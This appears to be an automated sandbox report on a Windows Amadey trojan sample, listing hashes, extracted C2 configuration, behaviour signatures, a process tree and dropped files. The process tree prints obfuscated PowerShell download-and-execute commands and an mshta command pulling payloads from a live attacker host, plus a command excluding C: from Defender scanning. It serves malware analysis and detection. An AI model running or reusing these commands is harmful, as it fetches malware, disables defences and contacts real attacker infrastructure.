Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 20:23

General

  • Target

    863f6e719058feed00201f407e1b5a7d7d26e3d912670078583bb4e9d320bed3.exe

  • Size

    1.8MB

  • MD5

    b647137c15b5964746d800f149c771ba

  • SHA1

    56cf6a851d0e4fdb5bba59365b7bb9ca7875e0ea

  • SHA256

    863f6e719058feed00201f407e1b5a7d7d26e3d912670078583bb4e9d320bed3

  • SHA512

    db9e3ba8d7f0468727edabd3b7ffd731c5c92ef5c6ad028c43b94475329b50d12b0c4f30ec0f46fb703543803b8c96d47150854888df11b43efa4d3c0f3a50ff

  • SSDEEP

    49152:oFBSXMHHF5rlTSZc4Zc5rPXnoCJImdAFqyAZ0U:oFBSXMFdlT1iwrPXnRImdKpW0U

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\863f6e719058feed00201f407e1b5a7d7d26e3d912670078583bb4e9d320bed3.exe
    "C:\Users\Admin\AppData\Local\Temp\863f6e719058feed00201f407e1b5a7d7d26e3d912670078583bb4e9d320bed3.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3108
      • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
        "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1980
      • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
        "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Windows\SYSTEM32\wscript.exe
          "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:868
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
              6⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1796
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3360
                • C:\Windows\system32\mshta.exe
                  mshta http://176.113.115.178/Windows-Update
                  8⤵
                  • Blocklisted process makes network request
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:2732
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                    9⤵
                    • UAC bypass
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3428
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3492
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:532
      • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
        "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2144
      • C:\Users\Admin\AppData\Local\Temp\1008015001\fa95864e2b.exe
        "C:\Users\Admin\AppData\Local\Temp\1008015001\fa95864e2b.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3320
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1000
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:4484

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    3823b095d58016063e977bbfe0e3e3d3

    SHA1

    456ccaf42bd79896b69abbce1d6845860f62b009

    SHA256

    5515bd64ef2b91fd3487570ee184108d296f5e5eee9dade85b9fd8f033989acf

    SHA512

    a6304dd20b8ad7ca6086ba5da200837e0037addd48f9b1ae9cfafe8de5108e1d2546b1ae52dbcd595820bd1057c114db75661f896493a7ce1b60a2d5945790a3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    6622ed5f8592ea827a26d5608f8fec3f

    SHA1

    e4360bdbaba62948776e4efba19120ecef7b0cbe

    SHA256

    c62f098bc2f7f95c2714f975915712a196bbd5cf59b577f51778db4daa546661

    SHA512

    c3da031cd6ffb73cc469fa128b89d56d920f467775668787361abc3c86bddee295a9356dfee8a106f697fcab43ce573172308d6f60779de2d6529c4ff614a07d

  • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe

    Filesize

    1.8MB

    MD5

    fa351b72ffb13bfc332a25a57a7f075f

    SHA1

    5af49613c179bed23dd43d76aedbe3d1b63004a3

    SHA256

    d2c90431f09fc7818c5afb43bbec077fc29544ddcb786bc655a82d1c33e20cdc

    SHA512

    de49eeaa695f9d6252bd3b547689b0e648999c7ee68d2e16a3d073d88505a1c6b0a4da538db7ce52653bfc2dc89a13dd07c894f8e28f9227f1d1c92df67216f9

  • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe

    Filesize

    50KB

    MD5

    666248c216a3f63828f739839230f9f6

    SHA1

    13690837235053762a538b4c5b2b601ec9f6bb22

    SHA256

    00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

    SHA512

    37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

  • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe

    Filesize

    752KB

    MD5

    98cb9d6881d33c116fbb3b32053029ee

    SHA1

    c8979ffbf2d5a7cde7b14577a4268395dbaa679d

    SHA256

    be43a1131f829116e564918c8932cd1e3f4621ee3d9aefdbf737534fe1a96f16

    SHA512

    3b48beada74be0512b22b9449d89be178fc927dc681ae9842e499f0db0392f46ae8eba64e96f558e73f738bba1b12bffa45ad7046cf81699bdc160554b87bd3a

  • C:\Users\Admin\AppData\Local\Temp\1008015001\fa95864e2b.exe

    Filesize

    4.2MB

    MD5

    e44fb60a2cfd998fee51e42e436fc4b5

    SHA1

    24edb01b49d8a6cc4533a8ada342be18c0ad13f9

    SHA256

    84363c685284008ab2c536946d3dd1b69bcbc1636754d6181b16611003760cb9

    SHA512

    4c1169f81b3e272e8db65264226f977bd24216cc558aac28036d827e3e64b484c7b8251ff80ce8094df4137ca1c3fc2a6c4b1813191e6cd91d2d15cc0f2e2293

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kycrrt3r.aec.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

    Filesize

    1.8MB

    MD5

    b647137c15b5964746d800f149c771ba

    SHA1

    56cf6a851d0e4fdb5bba59365b7bb9ca7875e0ea

    SHA256

    863f6e719058feed00201f407e1b5a7d7d26e3d912670078583bb4e9d320bed3

    SHA512

    db9e3ba8d7f0468727edabd3b7ffd731c5c92ef5c6ad028c43b94475329b50d12b0c4f30ec0f46fb703543803b8c96d47150854888df11b43efa4d3c0f3a50ff

  • C:\Users\Admin\AppData\Local\Temp\tempScript.js

    Filesize

    2KB

    MD5

    82f229d0c36b68073da70ef5958e425d

    SHA1

    2beb8cd227b49b1d119165d6e3d258ddb730387a

    SHA256

    0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

    SHA512

    4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

  • C:\Users\Admin\AppData\Roaming\CMD.vbs

    Filesize

    27KB

    MD5

    238ec4d17050e1841e8e0171407c2260

    SHA1

    2c8c14b257641f1e1151c6303dabde01621314f2

    SHA256

    163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

    SHA512

    3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

  • memory/532-70-0x0000020B824B0000-0x0000020B824D2000-memory.dmp

    Filesize

    136KB

  • memory/1000-126-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/1000-125-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/1084-18-0x0000000000D00000-0x00000000011C0000-memory.dmp

    Filesize

    4.8MB

  • memory/1084-1-0x00000000777A4000-0x00000000777A6000-memory.dmp

    Filesize

    8KB

  • memory/1084-2-0x0000000000D01000-0x0000000000D2F000-memory.dmp

    Filesize

    184KB

  • memory/1084-0-0x0000000000D00000-0x00000000011C0000-memory.dmp

    Filesize

    4.8MB

  • memory/1084-3-0x0000000000D00000-0x00000000011C0000-memory.dmp

    Filesize

    4.8MB

  • memory/1084-5-0x0000000000D00000-0x00000000011C0000-memory.dmp

    Filesize

    4.8MB

  • memory/1980-86-0x00000000003F0000-0x000000000089D000-memory.dmp

    Filesize

    4.7MB

  • memory/1980-85-0x00000000003F0000-0x000000000089D000-memory.dmp

    Filesize

    4.7MB

  • memory/1980-87-0x00000000003F0000-0x000000000089D000-memory.dmp

    Filesize

    4.7MB

  • memory/1980-40-0x00000000003F0000-0x000000000089D000-memory.dmp

    Filesize

    4.7MB

  • memory/1980-95-0x00000000003F0000-0x000000000089D000-memory.dmp

    Filesize

    4.7MB

  • memory/1980-38-0x00000000003F0000-0x000000000089D000-memory.dmp

    Filesize

    4.7MB

  • memory/2076-61-0x00000000029D0000-0x00000000029D6000-memory.dmp

    Filesize

    24KB

  • memory/2076-60-0x0000000000960000-0x0000000000972000-memory.dmp

    Filesize

    72KB

  • memory/2144-151-0x0000000000400000-0x000000000042D000-memory.dmp

    Filesize

    180KB

  • memory/2144-150-0x0000000000400000-0x000000000042D000-memory.dmp

    Filesize

    180KB

  • memory/3108-37-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-152-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-121-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-84-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-41-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-39-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-127-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-128-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-129-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-130-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-21-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-20-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-19-0x0000000000481000-0x00000000004AF000-memory.dmp

    Filesize

    184KB

  • memory/3108-97-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-153-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-178-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-176-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-157-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-158-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-159-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3108-16-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/3320-175-0x0000000000B00000-0x0000000001765000-memory.dmp

    Filesize

    12.4MB

  • memory/3320-177-0x0000000000B00000-0x0000000001765000-memory.dmp

    Filesize

    12.4MB

  • memory/4484-156-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB

  • memory/4484-155-0x0000000000480000-0x0000000000940000-memory.dmp

    Filesize

    4.8MB